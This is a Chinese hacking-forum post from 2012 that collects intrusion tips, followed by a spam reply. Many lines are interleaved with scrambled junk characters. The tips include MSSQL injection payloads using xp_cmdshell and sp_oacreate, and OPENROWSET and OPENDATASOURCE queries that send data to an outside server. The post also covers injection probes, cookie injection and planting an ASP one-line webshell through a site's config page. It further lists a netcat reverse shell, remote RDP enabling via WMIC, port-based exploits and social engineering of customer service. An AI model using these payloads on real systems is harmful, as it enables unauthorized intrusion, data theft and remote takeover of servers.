找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3389|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
2 u% c& Z3 b# D1 E: `$ |) h
  I7 d8 |) Z+ u, z: M1 H0 P% O0 B: l
SA点数据库分离搞法+语句:
* c  y# Z# g  W' S3 w
& @9 ]/ Z* r. d7 K9 t注射点不显错,执行下面三条语句页面都返回正常。
7 n& W0 B4 ^) S: ?1 x" p0 qand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')0 p9 T5 Z$ Q$ C) C5 L
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'). I! w1 r7 O8 E- Q, n
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell'). s3 z4 s3 N0 b' A0 z# q1 ]
可以列目录,判断系统为2000,web与数据库分离9 U2 c) \8 C5 Y  [4 |$ R
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。- `3 ?8 Q" s, x* R7 @) U' N  ~
在注射点上执行% O5 R9 }& k, n. W- ]8 r5 n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--7 t2 F* c5 s1 q. Q3 E' v0 R
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
* P) L4 g" o) D6 V! i还有我用NC监听得其他端口都没有得到IP。
3 Q! M# q- @6 u. N) G& v. @( M8 r
% j6 w( X. ^, r; t2 N% ]通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。. Y+ V) w0 c' J7 U
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
& C3 o& ?4 l" o% E+ q2 a1 x' t; k7 k" h6 G- U
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--. N. r. {$ ~$ h9 F

: f& X9 g4 x% r- ^) k现在就猜想是不是数据库是内网而且不能连外网。
: z7 s4 r2 ^7 d; l2 U, c
3 L: E( J% d+ B
( R/ _+ w$ k1 h/ q5 F0 o3 uaccess导出txt文本代码
2 y$ e# f* E& h8 ^7 [SELECT * into [test.txt] in 'd:\web\' 'text;' from admin$ u( T* J3 d" ]0 A. ?
. h8 X) s# g$ O7 C" k5 g

. ^3 h2 y* r! Y5 H) p( u# x! X! ?3 Y( s1 \& k
自动跳转到指定网站代码头/ `+ x; H; b8 I
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
" ^" h1 w8 o2 ]4 L4 j( o# U: v" Z. a+ j% Y& c+ T
1 e- H, {2 N( t3 `8 {' Q# L
入侵java or jsp站点时默认配置文件路径:
0 h' j6 ~, D% ~* b& _' `$ x. p( i9 q* P\web-inf\web.xml
0 L9 N9 h! |! k7 S- t' y% ztomcat下的配置文件位置:
- x+ i% I. ~) V. Y! r6 r\conf\server.xml            (前面加上tomcat路径)
1 a$ ~; R( h3 d) s\Tomcat 5.0\webapps\root\web-inf\struts-config.xml( o2 u3 M& s, t9 y9 ]
% Y  D9 x9 ~& ?
! z% G" G. |( c7 F

& ^& j4 u" P: k5 ^检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
. o( Y# r& N* m6 _3 M-1%23
% R  N2 z  P3 l( L> ! Q- ~% m% C4 f+ @
<
( d8 K  [  s( n& k2 B1'+or+'1'='1
! i! d- H. l) `id=8%bf
0 U* B7 e4 c& S. E9 g# j3 T" X( d) h3 f' G5 T0 }
全新注入点检测试法:
: U8 q! Y0 l& B0 E在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。) N( J& G$ ]0 ~* b4 E" D
* n$ ?  c" o2 x9 f
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。: M" G2 v! k0 u( ~7 Q3 f$ n' H
5 \- i0 o! O/ t" }0 [6 I' ]
搜索型注入判断方法:
( R5 ~( W: C# @$ N% Q北京%' and '1'='1' and '%'='
" H: {- U# L/ p' ?, y  W; w北京%' and '1'='2' and '%'='
; u( w5 H# c2 A! a  d! k% t! J' C2 F4 ^$ B
: F  D3 H: A3 M; }$ e
COOKIES注入:* U! @" @+ C+ J

9 n2 D1 F3 `9 I) @0 X$ ijavascript:alert(document.cookie="id="+escape("51 and 1=1"));
, W- ?. A8 O% l9 B. U$ e" f% I/ a
+ v1 D& p0 v/ p  u2000专业版查看本地登录用户命令:
5 i- L' B& j1 |7 nnet config workstation
( b; W2 G2 s" a) [8 \
  F' P5 a8 s8 u4 J8 B* K5 I$ F9 j* s3 f& f
2003下查看ipsec配置和默认防火墙配置命令:( k$ X5 o3 v8 Z1 o: A/ B, O2 {
netsh firewall show config0 s# Q$ Z* e% y- s. \
netsh ipsec static show all
) q2 d% M- E7 `
! q; Z7 Z) X& Q" b( N& B1 {2 d1 E不指派指定策略命令:
5 r+ H# f" J2 R+ k8 l9 c9 W8 `7 Dnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
3 E" O! L; q) q7 k+ B. U+ R7 t; snetsh ipsec static show policy all  显示策略名5 j4 ]- I$ L2 n3 o, ]
+ w$ E  b# [. J9 b

/ _4 v1 ~3 L+ f猜管理员后台小技巧:
, n  ]9 a% [. l7 Dadmin/left.asp ; W- C- W2 ]! O( L0 w
admin/main.asp
, W  u: v' D0 s- @4 d* Q8 radmin/top.asp
9 a: T' ?5 ]2 {" wadmin/admin.asp 3 {* B; D2 ], @; ?' n7 U9 W$ E
会现出菜单导航,然后迅雷下载全部链接+ ?) ]& m( y+ M- _' e# W
6 w3 e) z% x  |, U3 {& V. E9 ^
, F9 R0 B  T$ L1 ~
社会工程学:4 u( R8 D8 s% c, U* Y" J: _
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人# C/ n0 S6 n& Q0 z0 V
然后去骗客服
) Z6 \2 r( H# T) V7 L& W/ k7 d: _% {% I+ k  i3 n  S+ o* f

0 B- M8 d' A3 y# o. ^" g统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 5 ?; ]% v% i% i; N+ ~
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,   S& }# O$ G9 n
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
* U4 X7 |% r6 k" t6 F0 U
7 S) J4 `& v) A& t2 [/ Q& [  B% R  \1 g* [+ ^2 M

* h& d$ k$ D7 r. V5 u1 h! I$ b6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查), {! o' ^& T- J# C# p
$ u& e) d( t; P2 k) W1 n& u$ ]
& q# M9 F( z7 A& k

' T2 p6 F! y( J; b/ |  RCMD加密注册表位置
- D" i6 K1 Q# o' z4 P- P$ F(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor$ S. i' R( p; X; F3 F! m7 |
AutoRun
! S% ~% Z. ^/ q6 b9 ?& r: L% {3 }
. }/ j) @( O* W' a: u( }# x6 h+ O( F' \(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor& T" j1 m' V, X( P3 ?( w8 [
AutoRun
/ }( h2 V/ J$ r5 L; A3 E/ U& ]3 i) I
; O6 E: y1 Z# D; t& Q# C
在找注入时搜索Hidden,把他改成test
- Q7 s2 g3 u1 B1 S! `/ X
! F7 K. V) Y6 E% B" h
. ~: V; D, n! Y4 w  X1 H- k5 Y" e  y  ?0 k1 i
mstsc /v:IP /console
& [2 t0 C: @& D" @
# ]4 N% b' [' K2 X0 U" E- [9 O9 ?( v
一句话开3389:
0 \7 n# }0 @% f% u+ r- m
5 l2 T! l" `4 @% P( {1 y最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
1 L9 A  H# ]5 g" V( O6 ?$ @开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
1 a" C  K! T) ]
6 x$ _4 k' ~% @" f7 N; `8 l9 y9 }5 }! W  X1 h; M$ f" m3 u
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:/ H4 z: J5 x+ u2 _
Insert into admin(user,pwd) values('test','test')
% Z6 v% i$ L2 E4 l' o/ c/ k
/ j' e8 O9 i7 ~2 C! J2 V: h6 ]9 Y; J
NC反弹
8 K2 ?, {- x. [, \. e) U先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
6 s8 y5 t3 O# R然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)* t1 ?& t: Z3 a+ n, Q. K- W
/ A3 ~' _9 [# a! E5 Y
8 n6 P. c2 q, u" W
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
$ K1 y% H- o* D2 d" P! M
9 L5 |  N* {$ N5 y有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录6 E5 B1 {' n6 s  w5 h9 G: M
例如:
+ r9 n# P+ L' O" Y4 s/ c" isubst k: d:\www\ 用d盘www目录替代k盘
: K) t; c6 W: q; K( r# Z  wsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表